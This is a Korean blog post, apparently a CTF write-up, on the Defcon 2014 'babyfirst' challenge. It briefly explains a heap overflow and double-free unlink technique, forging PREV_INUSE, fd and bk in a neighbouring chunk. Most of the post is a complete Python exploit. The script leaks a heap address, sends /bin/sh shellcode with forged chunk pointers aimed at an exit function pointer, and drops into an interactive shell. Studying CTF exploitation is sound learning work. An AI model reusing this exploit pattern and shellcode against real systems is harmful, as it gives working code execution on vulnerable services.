[Defcon 2014] babyfirst - double free bug
Double Free Buf(DFB) 의 궁극적인 목적은 자신이 원하는 곳에 메모리를 라이팅 하는것(?) (처음 접해봤는데 매우 재미있는 기법이다ㅋ)
heap overflow 를 이용하여 이웃 chunk를 조작 (fake_chunk : PREV_INUSE, fd, bk)
-PREV_INUSE bit를 1로 만들어 기존 chunk 병합을 단절시키고 다음 free 시 fd bk 라이팅을 유도
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 | #!/usr/bin/python from socket import * import time from struct import * from hexdump import * p = lambda x: pack("<L", x) up = lambda x: unpack("<L", x)[0] cnt = 0 log = 0 def u(str): global sk data = '' while str not in data: data += sk.recv(1) if log != 0: print data return data def r(): time.sleep(0.1) global sk data = sk.recv(4096) if log != 0: print data return data def pu(str): global cnt data = u(str) print data print 'cnt',cnt cnt += 1 return data def pr(): global cnt s = r() print s print 'cnt',cnt cnt += 1 return s stream='' def s(str): #time.sleep(0.1) if str.find("\x00") != -1: print "NULL" if log != 0: print str global stream stream += str global sk return sk.send(str) IP = '1.1.1.5' PORT = 1234 sk = socket(2, 1) sk.connect((IP, PORT)) heap = u('Write to object [size=260]:\n') heap = heap.split('loc=')[11] heap = heap[:heap.find(']')] heap = int(heap,16) shellcode = "\xeb\x20"+"\x90"*100+"\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xE1\x99\xB0\x0B\xCD\x80\xC2" buf = 'A'*(260-len(shellcode)) exit_func = 0x804C8AC payload = '' payload += shellcode #data 260 payload += buf #data 260-shellcode len payload += p(1)#chunk2 size payload += p(exit_func-8) #fd payload += p(heap) #bk s(payload+'\n') r() r() while 1: s(raw_input('$')+'\n') pr() | cs |
틀린부분 지적해주시면 감사하겠습니다.
'Hacking > Pwnable' 카테고리의 다른 글
[Defcon 2014] shitsco - use-after-free or memory leak (0) | 2015.05.15 |
---|---|
[CodeGate 2013] Vuln 500 - integer overflow, heap realloc (0) | 2015.05.12 |